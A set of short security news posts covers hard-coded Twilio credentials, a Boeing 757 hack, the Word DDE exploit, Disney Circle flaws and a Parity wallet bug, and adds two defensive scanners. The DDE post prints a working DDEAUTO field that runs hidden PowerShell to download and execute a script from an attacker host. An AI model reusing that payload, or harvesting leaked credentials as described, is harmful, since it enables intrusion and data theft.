A Flaw in the World of Mobile Computing

The prospect of needing credentials to access a developer account in an app or to a website that provides an API is not a new concept. And the proliferated stereotype of the lazy developer is nothing to write home about. But some app developers have taken carelessness to new levels. Appthority calls a new vulnerability they have found “The Eavesdropper Vulnerability”. This is when the developer hard-codes their credentials to access the features of the device, specifically for the Twilio API. Those who exploit this vulnerability are able to access text messages, Twilio metadata, call metadata, and voice recordings.

This vulnerability does not rely on anything but the hard-coded credentials themselves. No jailbreak, hacking, or effort is required. All that is needed to acquire these developers’ credentials is to find an app that uses the Twilio API, skim through it to find them in plain text, then use your favorite method to exfiltrate the data using the credentials.

What’s the solution here? More security-conscious developers. There is no other option here than to have developers remove their credentials from the app’s code. That, and to not do it again. This vulnerability was entirely preventable; those responsible for it simply did not prevent it.

Alan Richman.

Source: https://www.appthority.com/mobile-threat-center/blog/eavesdropper-mobile-vulnerability-exposing-millions-conversations/
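As an added example, not from Appthority's write-up or the post above: a small Python checker for the pattern described, hard-coded Twilio credentials sitting in plain text in an app's source or binary. It assumes a Twilio Account SID is "AC" followed by 32 hex characters and an auth token is 32 hex characters; the line-context rule for tokens, the `strings`-style extraction and every sample value are constructed for this example.

```python
import re

# Assumed formats: an Account SID is "AC" + 32 hex characters; an auth token is 32 hex
# characters. A bare 32-hex string is only reported when the same line also mentions
# Twilio, a token or a secret (a heuristic of this example, to limit false positives).
ACCOUNT_SID = re.compile(r"\bAC[0-9a-fA-F]{32}\b")
HEX32 = re.compile(r"\b[0-9a-fA-F]{32}\b")
TOKEN_CONTEXT = re.compile(r"twilio|auth_?token|secret", re.IGNORECASE)
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{8,}")  # what the `strings` tool extracts

def extract_strings(blob):
    """Printable-ASCII runs of 8+ bytes from a compiled binary or a DEX/APK member."""
    return [m.group().decode("ascii") for m in PRINTABLE_RUN.finditer(blob)]

def scan_lines(lines):
    """Return (1-based index, kind) for each line that looks like a Twilio credential."""
    findings = []
    for idx, line in enumerate(lines, start=1):
        if ACCOUNT_SID.search(line):
            findings.append((idx, "account_sid"))
        if HEX32.search(line) and TOKEN_CONTEXT.search(line):
            findings.append((idx, "auth_token"))
    return findings

def scan_blob(blob):
    """The same check over the printable strings of a binary: the 'skim through it' step."""
    return scan_lines(extract_strings(blob))

# Constructed sample source and binary; the SID/token values are made up, not real credentials.
SAMPLE_SOURCE = [
    "public final class SmsSender {",
    '    static final String TWILIO_SID = "AC0123456789abcdef0123456789abcdef";',
    '    static final String TWILIO_AUTH_TOKEN = "fedcba9876543210fedcba9876543210";',
    '    static final String BUILD_ID = "00112233445566778899aabbccddeeff";',  # not a secret
    "}",
]
SAMPLE_BLOB = (b"\x00\x01\x7f" + b"twilio_auth_token=fedcba9876543210fedcba9876543210"
               + b"\x00\xff" + b"AC0123456789abcdef0123456789abcdef" + b"\x00")

if __name__ == "__main__":
    for where, hits in (("source", scan_lines(SAMPLE_SOURCE)), ("binary", scan_blob(SAMPLE_BLOB))):
        for idx, kind in hits:
            print(f"{where}: line/string {idx} looks like a hard-coded Twilio {kind}")
```

A check like this belongs in the build pipeline, before the app ships; the fix the post calls for is to keep such credentials off the device entirely, behind a server the app talks to.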


Boeing 757 planes susceptible to security breaches

Recently a group of experts worked with Homeland Security to see if they could hack into a Boeing 757 jetliner. The team was successful in the hack. The exact details were not disclosed, for obvious reasons, but they did say they got to the plane’s system through the radio frequency communications. Robert Hickey from Homeland Security presented at the CyberSat Summit, and most other experts said we have known that for years and it’s no big deal, but when Hickey went to tell pilots what they found, they had no idea their planes were at risk of cyber attacks. Now, Boeing 757s have not been made since 2004, so it seems like it shouldn’t be an issue anymore, except that many airlines like United and Delta still use these planes. President Trump’s personal plane, which he uses to fly most places, is also a 757. This issue is also difficult to patch: they say it would cost $1 million to change one line of code on a plane’s system and would take a year to implement, making a patch near impossible. Boeing has said it isn’t something to worry about because it is an older model and system, and the new planes like the 787 can’t be affected and were designed with security in mind. Which is good to hear, since a vulnerability in a plane could cause catastrophic problems.

-Levi Walker

Hackers Using Unpatched Microsoft Dynamic Data Exchange Exploit

There is a vulnerability present in Microsoft Office using its Dynamic Data Exchange (DDE) protocol. Exploiting it requires “no macros or, memory corruption”, and doesn’t show any security warnings (if correctly implemented) or raise flags with any antivirus software. There are thousands of applications that use the DDE protocol, including MS Word and Excel.

DDE allows two running applications to share data, and can be set to do so either once, or whenever new data becomes available. For example, one could use DDE to target a cell in Excel, and receive updates whenever that cell is edited. You can sync a cell in your own Excel doc with the cell in the original document.

The blog from Sensepost focused on using Microsoft Word and DDE to gain undetected access to command execution. The exploit is performed by editing an error message produced by adding a field to a Word doc. The error is edited to contain something like the following:

{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"  }

Or, you could do something worse than open the calculator, like this:

{ DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://evilserver.ninja/pp.ps1');powershell -e $e "}

Basically, you tell Word to execute an automatically updating DDE field, and then you have the field execute the command prompt, also calling your payload. In the proof of concept demonstration, they used a PowerShell command to launch an Empire stager as the payload.

Whenever the Word document is opened, it will first ask for permission to allow the file to be updated by a linked file. If DDE is something you deal with, this would be nothing unusual. There is then a second prompt, which is a security warning due to the DDE asking for access to the command prompt; however, this can be hidden with “proper syntax modification” according to the blog. Then you just have to get the Word file onto the target system, get the target to open the file, and click OK on the one prompt that pops up to allow the data to be shared. Boom, payload delivered.

Microsoft was sent this exploit, replicated it, and decided that it was a feature, so it will not be patched anytime soon. Microsoft has also released a Security Advisory in regards to various DDE-related vulnerabilities, most of which involve the user changing settings to secure and control Office. This requires the use of the Registry Editor, which if done incorrectly can break your computer, requiring you to reinstall your OS.

This vulnerability is now being exploited by cybercriminals and state-sponsored hackers. Notably, it has been utilized by the hacking group “Fancy Bear” which is believed to be affiliated with the Russian government. They have been using a spearphishing campaign around the New York terror attack in recent weeks to bait users into clicking on the malicious documents, infecting their system with malware. It has also been used against several organizations and companies in various forms.

Since it is a Microsoft process, nothing will stop DDE from running whatever is sent through it. One way to protect yourself is by disabling DDE entirely on your machines. You can also follow Microsoft’s recommendation of using the Registry Editor to secure Office, or you could go into the settings for some of the apps that use DDE and disable automatic updating or receiving updates from other DDE applications. As always, don’t click links or download files from emails unless you are certain that the source is safe.


Daniel Szafran


Article Sources:

Macro-less Code Exec in MSWord – (contains demo and proof of concept for exploit)

Russian ‘Fancy Bear’ Hackers Using (Unpatched) Microsoft Office DDE Exploit

Microsoft Security Advisory 4053440
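As an added example, written for this page rather than taken from the Sensepost post or the write-up above: a Python checker for the defender's side of this, which unzips a .docx, joins the field-code text in word/document.xml, and reports any DDE or DDEAUTO field before anyone opens the file. The minimal .docx packaging, the two sample documents (one carrying the calc.exe field quoted above) and the field-joining logic are constructed for this example.

```python
import html, io, re, zipfile
# Word keeps field codes in word/document.xml as <w:fldSimple w:instr="..."> or as <w:instrText>
# runs between fldChar begin/end markers; a field code may span several runs, so join them first.
TOKEN = re.compile(
    r'<w:fldChar[^>]*w:fldCharType="(begin|end)"[^>]*/?>'
    r'|<w:instrText[^>]*>(.*?)</w:instrText>'
    r'|<w:fldSimple[^>]*w:instr="([^"]*)"',
    re.DOTALL,
)
DDE_FIELD = re.compile(r"^\s*DDE(AUTO)?\b", re.IGNORECASE)

def field_instructions(document_xml):
    """Every field code in the document, one joined string per field."""
    fields, current = [], None
    for m in TOKEN.finditer(document_xml):
        kind, instr_text, simple_instr = m.groups()
        if kind == "begin":
            current = []
        elif kind == "end":
            if current is not None:
                fields.append(html.unescape("".join(current)))
            current = None
        elif instr_text is not None and current is not None:
            current.append(instr_text)
        elif simple_instr is not None:
            fields.append(html.unescape(simple_instr))
    return fields
def find_dde_fields(docx_bytes):
    """Field codes that would start a DDE/DDEAUTO link when the document is opened."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        xml = zf.read("word/document.xml").decode("utf-8")
    return [f for f in field_instructions(xml) if DDE_FIELD.search(f)]
def build_docx(body_xml):
    """Constructed minimal .docx package: only the part this detector reads."""
    doc = ('<?xml version="1.0" encoding="UTF-8"?><w:document xmlns:w="http://schemas.'
           'openxmlformats.org/wordprocessingml/2006/main"><w:body>' + body_xml + '</w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", doc)
    return buf.getvalue()

# Constructed samples: the calc.exe field from the post, split over two runs, and a harmless DATE field.
MALICIOUS_BODY = (
    '<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>'
    '<w:r><w:instrText xml:space="preserve"> DDE</w:instrText></w:r>'
    r'<w:r><w:instrText xml:space="preserve">AUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" </w:instrText></w:r>'
    '<w:r><w:fldChar w:fldCharType="separate"/></w:r><w:r><w:t>!Unexpected End of Formula</w:t></w:r>'
    '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>'
)
BENIGN_BODY = '<w:p><w:fldSimple w:instr=" DATE \\@ &quot;d MMMM yyyy&quot; "><w:r><w:t>10 November 2017</w:t></w:r></w:fldSimple></w:p>'
```

Run `find_dde_fields(open("suspect.docx", "rb").read())` against a real file at a mail gateway or in a triage script; an empty list means no DDE field code was found, not that the file is safe in every other respect.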

The Security of Disney’s Circle Device

When thinking about Disney, most people think of the amusement park rides, the cartoons, or even the luxurious restaurants, shops, and hotels that they have created. This general branding of Disney™ has set this idea of a kid-friendly and family-orientated experience. Regarding Disney’s past technology, Disney is fairly new to the technology game and is always trying to get their research and new innovative technologies integrated, mostly within their theme parks. One product that has nothing to do with the theme parks or cartoons that Disney stands for is called the Circle.

The Circle is a device that is made to connect family devices together, but most importantly, to protect kids from going on certain websites. The idea of this device is to be able to monitor devices without the hassle of loading software onto every device. The product connects to all devices under the same network (wired or wireless), and the host user of the Circle is able to set time limits on device use, block, and view whatever is happening on the devices. Even though the idea behind this device that Disney put out was good, there turned out to be multiple vulnerabilities in the software and product, two of which stand out.

The first vulnerability involves a notification bug in the software of the Circle. In general, intricate network packets can be crafted which lead to an OS command injection, where the attacker can send an HTTP request to trigger the vulnerability (CVE-2017-2917). The second vulnerability involves a bug in the signature verification of firmware updates for the Circle. An attacker who develops well-crafted network packets can cause unsigned firmware to be installed, after which alternate code can be loaded onto the device (CVE-2017-2898).

Overall, there are multiple vulnerabilities that are associated with this device released by Disney. Disney should have alternatively tested multiple common vulnerability techniques before launch of the Circle. In order to prevent further attacks from happening, Disney should sit down and go through these vulnerabilities and patch them, along with creating a stronger protective layer for the device for future encounters of similar attacks.

-Ryan Keihm

Please, Perform Proper Pre-release Procedures

Parity Wallet, a wallet used for storing Ethereum, had a serious vulnerability exposed in July with its multi-factor wallets. One party could take over ownership of another’s wallet. A white hat group of Ethereum users realized what was going on and used the same vulnerability to claim every other user’s wallet so that the original actor (a black hat, who stole roughly $30 million) could not. On July 20th, this vulnerability was patched.

Now there’s a new issue.

Any multi-factor wallets created or updated after the July 20th patch can no longer move money out of their wallet. This is because calling initWallet just converts a contract library into a multi-factor wallet instead of allowing one to use the wallet.

This is not an issue with Ethereum at large, only with Parity Multi-factor wallets.

Official post: https://paritytech.io/blog/security-alert.html

By: Connor Shade